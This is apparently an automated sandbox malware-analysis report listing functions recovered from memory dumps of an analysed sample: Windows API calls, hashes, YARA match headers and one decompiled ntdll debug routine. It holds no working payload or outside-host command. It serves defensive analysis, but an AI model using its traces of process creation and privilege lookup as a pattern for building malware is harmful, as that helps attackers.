                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: fe56b8178ae62d234baab678795bd56be17600d09520113c7cb8969899b41f71
                                                                          • Instruction ID: 4514389a5e172b97d74f904cf2820915db8be2a515022f41c2589729efdc9dc1
                                                                          • Opcode Fuzzy Hash: fe56b8178ae62d234baab678795bd56be17600d09520113c7cb8969899b41f71
                                                                          • Instruction Fuzzy Hash: 003191B1500744ABD714DF64C8C4FABB7B9EF88704F4080ADE6699B245DB70A450CBE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B17EA2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B03B93), ref: 02B17EDD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID: .z`
                                                                          • API String ID: 3298025750-1441809116
                                                                          • Opcode ID: 53266be44d7de86cae5244340a044c31d2f7d4ccb8494e733b6cf42abc58f076
                                                                          • Instruction ID: 66a3aa7b3dd731ba534f617678270c2578ec11ab90d5f48a09173a9bccc34cf2
                                                                          • Opcode Fuzzy Hash: 53266be44d7de86cae5244340a044c31d2f7d4ccb8494e733b6cf42abc58f076
                                                                          • Instruction Fuzzy Hash: ACE0EDB22006006BDB14DF64CC44EE7376AAF84360F154699F9189B202C131E8008FA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B17EB0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B03B93), ref: 02B17EDD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID: .z`
                                                                          • API String ID: 3298025750-1441809116
                                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                          • Instruction ID: 7a651a19f4319692331e8fe9653676c0bd30e38c2e2cb6700f52243d71e007fb
                                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                          • Instruction Fuzzy Hash: 78E046B5210208ABDB18EF99CC48EA777ADEF88750F018598FE085B241C630F910CAF0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B06EB0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B06F0A
                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B06F2B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: dc3ba57f29cad83f4c74190252de1a17939ff0c5820657c3f7100e7e8044d768
                                                                          • Instruction ID: 8dd959ef1d5c7786bc967be5572c963d3d0b3c0df240e3e59c6d7748a4fecaab
                                                                          • Opcode Fuzzy Hash: dc3ba57f29cad83f4c74190252de1a17939ff0c5820657c3f7100e7e8044d768
                                                                          • Instruction Fuzzy Hash: 4501A271A802287BE721AA949C42FBE7B6D9B40F50F140198FF04BA1C1E69479068BF6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B09900, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02B09972
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 37f4746ef459d9f07f06715d19472fa1fcea844b9e4b44dfac876fc9659aa77f
                                                                          • Instruction ID: 731c17ef93b539a4ad852e786e071ba0cd35a517a27864a00dadc19da8ede129
                                                                          • Opcode Fuzzy Hash: 37f4746ef459d9f07f06715d19472fa1fcea844b9e4b44dfac876fc9659aa77f
                                                                          • Instruction Fuzzy Hash: 8C011EB5D0120DABDF10DAE4DC81F9EB779AB44718F4041E5AA0897281F631EB54CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B17F20, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B17F74
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          • API String ID: 2186235152-0
                                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                          • Instruction ID: 1342ef2d05beafe2ddf4034aa6988e5723fb7f070d17cb696ee2c145fad3f4d9
                                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                          • Instruction Fuzzy Hash: 5401B2B2210108BFCB54DF89DC80EEB77AEAF8C754F558258FA0D97240C630E851CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B169F0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02B0CA10,?,?), ref: 02B16A2C
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: e6fffc096a2db29b2fc3fb44f3d652056e80c1857a2d27424bfde3dad46471f4
                                                                          • Instruction ID: 330c729ac6b88a8d16f9da4ad9c5ede6dddea5e7a54572544e24ba439d188a5f
                                                                          • Opcode Fuzzy Hash: e6fffc096a2db29b2fc3fb44f3d652056e80c1857a2d27424bfde3dad46471f4
                                                                          • Instruction Fuzzy Hash: F3E092733903143AE3306599AC02FA7B79CCB91B61F540066FA0DEB2C0D595F40146E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B17F7A, Relevance: 1.5, APIs: 1, Instructions: 35processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B17F74
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          • API String ID: 2186235152-0
                                                                          • Opcode ID: 649661dbbcc5ce3d0dd600770536551658eb79619c738f093dbb96d38e31b225
                                                                          • Instruction ID: 9a9b1b4054704892d59c5f05182c1c38f87ca95b8b0f1fe335e3911575f8d977
                                                                          • Opcode Fuzzy Hash: 649661dbbcc5ce3d0dd600770536551658eb79619c738f093dbb96d38e31b225
                                                                          • Instruction Fuzzy Hash: 3FF05E762402146FDB24DF54DC40EEB736DEF88360F508559F9085B281C630E8118BF0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B18010, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,02B0CCD2,02B0CCD2,?,00000000,?,?), ref: 02B18040
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                          • Instruction ID: f182861de0ef346226bbcb154c7419fbf50aca6f92c0a83f55e99afb122b97c3
                                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                          • Instruction Fuzzy Hash: 42E01AB5200208ABDB10DF49CC84EE737ADAF88650F018554BA0857241C930E8108BF5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B0D138, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02B078B3,?), ref: 02B0D16B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 6751546a2e3cdcb51b190afe3ad7f57296b9ba61db38396732dc48e375eebbb4
                                                                          • Instruction ID: 239de2bae82a4b833a0c9da15668dd29c8de8eb553aaefdb4700b58b43cfa9e6
                                                                          • Opcode Fuzzy Hash: 6751546a2e3cdcb51b190afe3ad7f57296b9ba61db38396732dc48e375eebbb4
                                                                          • Instruction Fuzzy Hash: C7E0C2716403053EE720EFB88C96FAA77A69F54B40F0801A4F489D72C3D920E002C620
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02B0D140, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02B078B3,?), ref: 02B0D16B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Offset: 02B00000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: fc3aa382f1ca126d7b5c13840b0101a96bc9fe2aff3cd1676ce3d9546b1423f1
                                                                          • Instruction ID: a7ec5bd5208e1e9804f65cfa76e2dacd54d6941817ecea19ee90423b1225f0b5
                                                                          • Opcode Fuzzy Hash: fc3aa382f1ca126d7b5c13840b0101a96bc9fe2aff3cd1676ce3d9546b1423f1
                                                                          • Instruction Fuzzy Hash: 91D05E617503043AE610AAA49C42F2632C99B44A44F4900A4F948972C3E950E4018561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EB967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503688760.0000000002E50000.00000040.00000001.sdmp, Offset: 02E50000, based on PE: true
                                                                          • Associated: 00000005.00000002.504256743.0000000002F6B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 69287949b82e14ae70468552e30a8064993deeda6a208acef8d5e709e2b8d45f
                                                                          • Instruction ID: 01cfaf23b34500be64a9da4d5669c971da63bc6d96b8bdd049412efa05bd512f
                                                                          • Opcode Fuzzy Hash: 69287949b82e14ae70468552e30a8064993deeda6a208acef8d5e709e2b8d45f
                                                                          • Instruction Fuzzy Hash: 07B09B719414C5C5D712D7B04B08B5779047BD0745F36D066D2020681F477DC091F5B5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 02F0FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 53%
                                                                          			E02F0FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02EBCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02F05720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02F05720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                          0x02f0fdda
                                                                          0x02f0fde2
                                                                          0x02f0fde5
                                                                          0x02f0fdec
                                                                          0x02f0fdfa
                                                                          0x02f0fdff
                                                                          0x02f0fe0a
                                                                          0x02f0fe0f
                                                                          0x02f0fe17
                                                                          0x02f0fe1e
                                                                          0x02f0fe19
                                                                          0x02f0fe19
                                                                          0x02f0fe19
                                                                          0x02f0fe20
                                                                          0x02f0fe21
                                                                          0x02f0fe22
                                                                          0x02f0fe25
                                                                          0x02f0fe40

                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F0FDFA
                                                                          Strings
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02F0FE01
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02F0FE2B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.503688760.0000000002E50000.00000040.00000001.sdmp, Offset: 02E50000, based on PE: true
                                                                          • Associated: 00000005.00000002.504256743.0000000002F6B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                          • API String ID: 885266447-3903918235
                                                                          • Opcode ID: a2bb08cc159be14ce6e10a86cae49d1a4b7847ea512c8b3511b5f061f2c27207
                                                                          • Instruction ID: 6e420af700016dfc3135ac2613525698fdd1c285fa36b268d6c44e1522d29d70
                                                                          • Opcode Fuzzy Hash: a2bb08cc159be14ce6e10a86cae49d1a4b7847ea512c8b3511b5f061f2c27207
                                                                          • Instruction Fuzzy Hash: 84F0F632680205BFE6301A55DC46F73BB5BEB447B0F244315FB28565D1DAA2F820AAF0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%